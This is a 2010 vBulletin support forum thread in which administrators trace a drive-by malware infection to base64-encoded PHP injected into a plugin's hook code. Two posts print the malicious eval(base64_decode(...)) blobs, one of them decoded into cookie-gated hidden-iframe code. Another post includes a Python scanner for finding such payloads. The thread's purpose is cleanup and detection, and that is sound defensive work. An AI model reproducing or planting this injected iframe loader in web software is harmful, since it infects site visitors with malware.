new 0 day exploit? (bekebu.in / cuzelu.in)
SomeDude-GP
06-24-2010, 03:02 PM
I have noticed in the last few days my VB install has been trying to infect users with a trojan coming from bekebu.in and/or cuzelu.in.
http://support.clean-mx.de/clean-mx/viruses.php?domain=bekebu.in&submit=query
Not sure if this was a new 0-day going around or not, but it may be worth someone's time to look into this.
:eek:
--------------- Added 1277395487 at 1277395487 ---------------
I have blocked out the /16 that those domains are coming from, and Google Safe Browsing doesn't come up with the malware warning anymore.
91.188.0.0/16
http://www.db.ripe.net/whois?form_type=simple&full_query_string=&searchtext=91.188.59.55&submit.x=0&submit.y=0&submit=Search
http://www.bfk.de/bfk_dnslogger.html?query=91.188.59.55
http://www.senderbase.org/senderbase_queries/detailip?search_string=91.188.59.55
ChopSuey
06-24-2010, 07:39 PM
What file is calling that site?
SomeDude-GP
06-26-2010, 02:27 PM
I finally found the offending code. It is in the datastore/pluginlist table. It's a base64 encoded string.
\r\n@eval(base64_decode(\"aWYgKCFpc3NldCgkX0NPT0tJRVsneGxvdiddKSkgew0KJHhiID 0gYXJyYXkoJ01TSUUnLCdNeUlFJywnSUUnLCdGaXJlZm94Jywn T3BlcmEnLCdOZXRzY2FwZScsJ0Nocm9tZScsJ1NhZmFyaScsJ0 1lZGlhIENlbnRlcicpOw0KJGlmcmFuZCA9IG10X3JhbmQoMCwx MTEpOw0KJGRvbWIgPSAiaHR0cDovL3d3dy5mZWFsYXRvYy5jby 5jYy9jbG8ucGhwIjsNCmZvcmVhY2ggKCR4YiBhcyAkeGJiKSB7 DQppZihzdHJzdHIoc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF 9VU0VSX0FHRU5UJ10pLHN0cnRvbG93ZXIoJHhiYikpKSB7DQpl Y2hvIDw8PEhKSg0KPHNjcmlwdD4NCmZ1bmN0aW9uIFNldENvb2 tpZShjb29raWVOYW1lLGNvb2tpZUNvbnRlbnQpew0KIHZhciBj b29raWVQYXRoID0gJy8nOw0KIHZhciBleHBEYXRlPW5ldyBEYX RlKCk7DQogZXhwRGF0ZS5zZXRUaW1lKGV4cERhdGUuZ2V0VGlt ZSgpKzM3MjgwMDAwMCkgIDsNCiB2YXIgZXhwaXJlcz1leHBEYX RlLnRvR01UU3RyaW5nKCk7DQogZG9jdW1lbnQuY29va2llPWNv b2tpZU5hbWUrIj0iK2VzY2FwZShjb29raWVDb250ZW50KSsiO3 BhdGg9Iitlc2NhcGUoY29va2llUGF0aCkrIjtleHBpcmVzPSIr ZXhwaXJlczsgDQp9DQpTZXRDb29raWUoInhsb3YiLCAiZGF5Ii k7DQo8L3NjcmlwdD4NCjxpZnJhbWUgbmFtZT0iJGlmcmFuZCIg d2lkdGg9IjEiIGhlaWdodD0iMSIgc2Nyb2xsaW5nPSJubyIgZn JhbWVib3JkZXI9Im5vIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2lu aGVpZ2h0PSIwIiBzcmM9IiRkb21iIj48L2lmcmFtZT4NCkhKSj sNCmJyZWFrOw0KIH0NCiB9DQp9\"));
which resulted in:
if (!isset($_COOKIE['xlov'])) {
$xb = array('MSIE','MyIE','IE','Firefox','Opera','Netscape','Chrome','Safari','Media Center');
$ifrand = mt_rand(0,111);
$domb = "http: // www. fealatoc.co .cc/clo.php";
foreach ($xb as $xbb) {
if(strstr(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower($xbb))) {
echo <<<HJJ
<script>
function SetCookie(cookieName,cookieContent){
var cookiePath = '/';
var expDate=new Date();
expDate.setTime(expDate.getTime()+372800000) ;
var expires=expDate.toGMTString();
document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires;
}
SetCookie("xlov", "day");
</script>
<iframe name="$ifrand" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="$domb"></iframe>
HJJ;
break;
}
}
}
--------------- Added 1277566093 at 1277566093 ---------------
The URL in the script code is broken on purpose.
--------------- Added 1277566152 at 1277566152 ---------------
Thanks to the people over at Tapatalk for helping me figure this out. :wink:
TNCclubman
06-26-2010, 02:46 PM
You're running Tapatalk on your vB? Or is it just a clean install of vB?
SomeDude-GP
06-27-2010, 11:00 AM
We have been using Tapatalk for a while now. Last week a few members started getting virii warnings about bekebu.in and/or cuzelu.in. A few days ago, one of the admins @ Tapatalk contacted us to let us know they had shut us down on their side due to the virii issue, and they have helped us locate some of this code.
--------------- Added 1277640262 at 1277640262 ---------------
fealatoc . co . cc info:
http://www.db.ripe.net/whois?form_type=simple&full_query_string=&searchtext=91.216.122.7&submit.x=0&submit.y=0&submit=Search
http://www.bfk.de/bfk_dnslogger.html?query=91.216.122.7
SomeDude-GP
06-27-2010, 11:48 AM
Post Thanks 'Hack' got hacked.
SomeDude-GP
06-27-2010, 11:49 AM
Also Reported to PT author @ https://vborg.vbsupport.ru/showpost.php?p=2060447&postcount=948
BirdOPrey5
06-27-2010, 11:52 AM
I guess the question is: did having Tapatalk installed contribute to how you got hacked, or were they just helpful in finding it? As I have Tapatalk installed, I'm curious too.
SomeDude-GP
06-27-2010, 12:17 PM
Tapatalk admins were very helpful with this situation. IMHO, I don't think it has anything to do with the Tapatalk plugin. I think it's the Post Thanks `hack` that is vulnerable, but this will need to be tested and confirmed.
yellowpeter
06-27-2010, 12:19 PM
I am not sure either; the information is mixed. Some forums that didn't install Tapatalk also got hacked. But one forum found a mysterious PHP file added to the Tapatalk directory, which caught our attention. So we went ahead and checked our packaging to make sure the directory is not writable by default (which was an oversight and only happened in one version release).
We have sent out emails to all forum owners to upgrade, so I hope to keep this infection to a minimum.
djbaxter
06-27-2010, 12:44 PM
Your screenshot in https://vborg.vbsupport.ru/showpost.php?p=2060449&postcount=6 shows a Thank You plugin at the global_setup_complete hook.
There is no Thank You plugin that's using that hook.
To blame the Thank You hack for this seems misguided. You were hacked by tapatalk. Lord knows what else got corrupted in the process.
caliman
06-28-2010, 02:32 AM
I would like to thank SomeDude-GP for posting that code. I have been dealing with this issue for a week on my site. You may have just helped me find this code.
I had deleted my tapatalk directory so I didn't have a possible roadmap to where they placed that code.
Searching my datastore table just now, it appears that they inserted it in one of my plugins.
This is as far as I have gotten, but I am very encouraged to find a match to the code you posted.
THANK YOU. I owe you some beers.
caliman
--------------- Added 1277699440 at 1277699440 ---------------
In my case it was the 'Members who visited today' plugin that got infected.
The global_start hook:
if ($show['wvt'])
{
if ($vbulletin->options['wvt24'])
{
$cutoff = TIMENOW - 86400;
$whodesc = $vbphrase['wvt_visited_today_24'];
}
else
{
$whodesc = $vbphrase['wvt_visited_today'];
$tnow = date('YmdHis',TIMENOW - intval($vbulletin->options['hourdiff']));
$cutoff = TIMENOW - (substr($tnow,8,2)*3600 + substr($tnow,10,2)*60 + substr($tnow,12,2));
}
unset ($whotoday);
$show['loggedinusers'] = true;
if ($vbulletin->options['wvtnames'])
{
$todaysusers = $vbulletin->db->query_read_slave("
SELECT * FROM ".TABLE_PREFIX."user FORCE INDEX (lastactivity)
WHERE lastactivity > $cutoff ORDER BY username
");
$totaltoday = 0;
while ($today = $vbulletin->db->fetch_array($todaysusers))
{
$totaltoday += 1;
$today['markinv'] = '';
$today['visible'] = true;
if ($today['options'] & $vbulletin->bf_misc_useroptions['invisible'])
{
$today['visible'] = false ;
if (($vbulletin->userinfo['permissions']['genericpermissions']
& $vbulletin->bf_ugp_genericpermissions['canseehidden'])
OR $today['userid'] == $vbulletin->userinfo['userid'])
{
$today['markinv'] = '*';
$today['visible'] = true ;
}
}
if ($today['visible'])
{
$ugroup = ($today['displaygroupid'] > 0 ? $today['displaygroupid'] : $today['usergroupid']);
$today['opentag'] = $vbulletin->usergroupcache[$ugroup]['opentag'];
$today['closetag'] = $vbulletin->usergroupcache[$ugroup]['closetag'];
$today['wrdate'] = vbdate($vbulletin->options['timeformat'], $today['lastactivity']);
eval('$whotoday .= "' . fetch_template('Display_Visitors_User') . '" . ", ";');
}
}
if ($whotoday)
{
$whotoday = substr($whotoday, 0, -2);
}
else
{
$whotoday = $vbphrase['wvt_no_visitors'];
}
}
else
{
$todaysusers = $vbulletin->db->query_first_slave("
SELECT COUNT(lastactivity) AS whotoday
FROM ".TABLE_PREFIX."user FORCE INDEX (lastactivity)
WHERE lastactivity > $cutoff
");
$totaltoday = $todaysusers['whotoday'];
$whotoday = $vbphrase['wvt_no_visitors_display'];
}
if ($vbulletin->options['wvtcol'])
{
$vbcollapse['collapseimg_forumhome_todayusers'] = '_collapsed';
$vbcollapse['collapseobj_forumhome_todayusers'] = 'display:none;';
}
$ftotaltoday = vb_number_format($totaltoday);
$whotitle = construct_phrase($whodesc,$ftotaltoday);
$pid = 'paulm_wvt_37';
if ($pemdata37['set'] == true)
{
$data_wvt =& $pemdata37[$pid];
}
else
{
if ($pemdata37 = unserialize($vbulletin->options['pemdata37']))
{
$pemdata37['set'] = true;
$data_wvt =& $pemdata37[$pid];
}
else
{
$data_wvt = array('version' => 'N/A');
}
}
if ($vbulletin->options['enable_wvt'])
{
$vbulletin->templatecache["{$vbulletin->options['template_wvt']}"] = str_replace($vbulletin->options['text_wvt'],
$vbulletin->options['text_wvt'].$vbulletin->templatecache['Display_Visitors'],$vbulletin->templatecache["{$vbulletin->options['template_wvt']}"]);
}
if ($vbulletin->options['wvtmost'])
{
if (empty($vbulletin->maxloggedin))
{
if (method_exists($vbulletin->datastore,'do_fetch'))
{ // Datastore extension exists, use it
$vbulletin->datastore->do_fetch('maxloggedin',$errors);
if ($errors[0])
{ // Fetch failed, use original datastore
$vbulletin->datastore->do_db_fetch("'maxloggedin'");
}
}
else
{ // No extension, use original datastore
$vbulletin->datastore->do_db_fetch("'maxloggedin'");
}
}
if ($totaltoday > intval($vbulletin->maxloggedin['maxvisitors']))
{
$vbulletin->maxloggedin['maxvisitorsdate'] = TIMENOW;
$vbulletin->maxloggedin['maxvisitors'] = $totaltoday;
build_datastore('maxloggedin', serialize($vbulletin->maxloggedin),1);
}
if ($vbulletin->options['wvtmost'])
{
if ($vbulletin->options['wvt24'])
{
$description = $vbphrase['wvt_members_24'];
}
else
{
$description = $vbphrase['wvt_members_day'];
}
$visitors = construct_phrase(
$description, vb_number_format($vbulletin->maxloggedin['maxvisitors']),
vbdate( $vbulletin->options['dateformat'], $vbulletin->maxloggedin['maxvisitorsdate'], true ),
vbdate( $vbulletin->options['timeformat'], $vbulletin->maxloggedin['maxvisitorsdate'] )
);
$whotoday = $visitors . "<br />" . $whotoday;
}
}
}
@eval(base64_decode("aWYgKCFpc3NldCgkX0NPT0tJRVsneGxvdiddKSkgew0KJHhiID 0gYXJyYXkoJ01TSUUnLCdNeUlF
JywnSUUnLCdGaXJlZm94JywnT3BlcmEnLCdOZXRzY2FwZScsJ0 Nocm9tZScsJ1NhZmFyaScsJ01l
ZGlhIENlbnRlcicpOw0KJGlmcmFuZCA9IG10X3JhbmQoMCwxMT EpOw0KJGRvbWIgPSAiaHR0cDov
L3d3dy5nZXR0aWFvLmNvLmNjL3BsLnBocCI7DQpmb3JlYWNoIC gkeGIgYXMgJHhiYikgew0KaWYo
c3Ryc3RyKHN0cnRvbG93ZXIoJF9TRVJWRVJbJ0hUVFBfVVNFUl 9BR0VOVCddKSxzdHJ0b2xvd2Vy
KCR4YmIpKSkgew0KJGRldmIgPSA8PDxISkoNCjxzY3JpcHQ+DQ pmdW5jdGlvbiBTZXRDb29raWUo
Y29va2llTmFtZSxjb29raWVDb250ZW50KXsNCiB2YXIgY29va2 llUGF0aCA9ICcvJzsNCiB2YXIg
ZXhwRGF0ZT1uZXcgRGF0ZSgpOw0KIGV4cERhdGUuc2V0VGltZS hleHBEYXRlLmdldFRpbWUoKSsz
NzI4MDAwMDApICA7DQogdmFyIGV4cGlyZXM9ZXhwRGF0ZS50b0 dNVFN0cmluZygpOw0KIGRvY3Vt
ZW50LmNvb2tpZT1jb29raWVOYW1lKyI9Iitlc2NhcGUoY29va2 llQ29udGVudCkrIjtwYXRoPSIr
ZXNjYXBlKGNvb2tpZVBhdGgpKyI7ZXhwaXJlcz0iK2V4cGlyZX M7IA0KfQ0KU2V0Q29va2llKCJ4
bG92IiwgImRheSIpOw0KPC9zY3JpcHQ+DQo8aWZyYW1lIG5hbW U9IiRpZnJhbmQiIHdpZHRoPSIx
IiBoZWlnaHQ9IjEiIHNjcm9sbGluZz0ibm8iIGZyYW1lYm9yZG VyPSJubyIgbWFyZ2lud2lkdGg9
IjAiIG1hcmdpbmhlaWdodD0iMCIgc3JjPSIkZG9tYiI+PC9pZn JhbWU+DQpISko7DQpicmVhazsN
CiB9DQogfQ0KfQ=="));
Uninstalling the plugin did the trick. This also rebuilds the datastore.
You can search your database to look for this code by doing this:
SELECT * FROM plugin WHERE phpcode LIKE "%base64_decode%";
This should give you a result with the code, and you can figure out which plugin it is in. You can verify through the plugin manager. Then uninstall that plugin. That will remove this exploit and rebuild the datastore. Reinstall the plugin if you want after that.
Hope this helps someone. This has been absolutely brutal.
caliman
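A triage helper for the search caliman describes, which also reads the kind of decoded payload SomeDude-GP posted earlier in the thread: it scans plugin rows for eval(base64_decode(...)), decodes the blob despite the whitespace that forum line-wrapping inserts, and reports the hook it was injected into plus the cookie gate, user-agent filter, hidden iframe and contacted URLs. This is added example code, not from the thread or from vBulletin; the plugin rows, payload body and placeholder domain are constructed.

```python
import base64
import re

# Constructed vBulletin plugin rows (pluginid, title, hookname, phpcode), shaped like the
# result of SELECT * FROM plugin WHERE phpcode LIKE '%base64_decode%'. The injected body
# copies the structure of the thread's payload with a placeholder domain, not the real sample.
PAYLOAD_PHP = (
    "if (!isset($_COOKIE['xlov'])) {\n"
    "$domb = \"http://placeholder.invalid/clo.php\";\n"
    "if (strstr(strtolower($_SERVER['HTTP_USER_AGENT']), 'msie')) {\n"
    "echo '<iframe width=\"1\" height=\"1\" src=\"' . $domb . '\"></iframe>';\n"
    "}\n}"
)
_b64 = base64.b64encode(PAYLOAD_PHP.encode()).decode()
# Forum and extraction line-wrapping insert whitespace inside the blob, as in the thread.
WRAPPED_B64 = _b64[:40] + " " + _b64[40:80] + "\n" + _b64[80:]
SAMPLE_ROWS = [
    (7, "Members who visited today", "global_start",
     "if ($show['wvt']) { /* legitimate plugin code */ }\n"
     f'@eval(base64_decode("{WRAPPED_B64}"));'),
    (8, "Post Thank You Hack", "postbit_display_complete",
     "$show['thanks'] = true; // clean: no eval"),
]
# Matches eval(base64_decode("...")), including the datastore copy with escaped quotes.
EVAL_RE = re.compile(
    r"@?eval\s*\(\s*base64_decode\s*\(\s*\\?[\"']([A-Za-z0-9+/=\s]+?)\\?[\"']\s*\)\s*\)")

def decode_blob(blob: str) -> str:
    # Strip wrapping whitespace and restore padding before decoding.
    clean = re.sub(r"\s+", "", blob)
    clean += "=" * (-len(clean) % 4)
    return base64.b64decode(clean).decode("utf-8", errors="replace")

def extract_indicators(php: str) -> dict:
    # The facts a triage needs: cookie gate, contacted URLs, UA filtering, hidden iframe.
    return {"cookie_gate": re.findall(r"\$_COOKIE\['([^']+)'\]", php),
            "urls": re.findall(r"https?://[^\s\"']+", php),
            "ua_filter": "HTTP_USER_AGENT" in php,
            "iframe": "<iframe" in php.lower()}

def scan_plugins(rows) -> list:
    # One finding per encoded eval, tagged with the plugin and hook it was injected into.
    findings = []
    for pluginid, title, hookname, phpcode in rows:
        for m in EVAL_RE.finditer(phpcode):
            decoded = decode_blob(m.group(1))
            findings.append({"pluginid": pluginid, "title": title, "hook": hookname,
                             "decoded": decoded, **extract_indicators(decoded)})
    return findings
```

Run scan_plugins over rows fetched from your own plugin table; a finding whose decoded code sets a cookie and echoes a 1x1 iframe to a domain you do not own is the pattern this thread describes.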
SomeDude-GP
06-28-2010, 12:02 PM
Glad I could help you find that code caliman :)
djbaxter: The Post Thanks mod was only a guess. I have way too many things going on to really dig into it very much. I did notice that the Tapatalk plugin was updated on 06/25/2010 though.
--------------- Added 1277730343 at 1277730343 ---------------
What I did was go into Plugins & Products --> Product Manager. Then I found the part of the plugin that had the code and just deleted the code.
caliman
06-28-2010, 01:28 PM
Thanks again. I was serious about the beer.
I have confirmed that this removed the exploit from my site.
djbaxter
06-28-2010, 01:48 PM
Thanks to both of you. While my forum wasn't showing any symptoms, I did the search using phpMyAdmin and verified that the exploit was not present on my forums.
vBulletin® v3.8.12 by vBS, Copyright ©2000-2025, vBulletin Solutions Inc.